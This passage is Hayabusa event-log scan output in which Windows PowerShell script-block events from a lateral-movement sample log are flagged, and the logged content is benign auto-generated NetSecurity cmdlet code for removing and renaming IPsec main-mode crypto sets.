} if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject 
(cdxml)') -contains $_ } { $__cmdletization_retur",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"nValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' -Alias '*' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and 
(@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 